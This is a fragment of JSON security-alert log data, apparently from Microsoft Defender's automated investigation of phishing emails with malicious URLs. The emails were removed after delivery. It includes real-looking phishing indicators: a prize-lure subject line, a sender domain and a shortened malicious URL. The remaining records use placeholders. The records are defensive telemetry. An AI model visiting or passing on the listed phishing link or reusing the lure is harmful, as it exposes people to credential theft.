(Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (SenderIp:\\\\\\\"40.107.244.101\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;40.107.244.101;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 
AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:88f2ce520265ef415e7f63e840feec95\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 
AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"wdezd.ersdz.meradebo.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c 
\ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;wdezd.ersdz.meradebo.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}" + "message": 
"{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"123abc456-d789-0e1f-2a34-b56789c01234\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:12345a6789bc01de23456f789ab0\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message 
moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's 
mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:012345a6789bcd0e1f23a4b5cd678ef9\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 
AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\"],\\\"Intent
\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message 
moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"user@mailbox.com\\\",\\\"Upn\\\":\\\"user@mailbox.com\\\",\\\"AadId\\\":\\\"0123ac45-6c7d-e89f-a0123b45c6d7\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:1a2b3456c7defabc8901d2e3fa456789\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0123a4567b8c9de0fa123bcde4f5a6b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:01a2bc345678de901f2a34b567cdef89\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"test.integration.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;test.integration.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 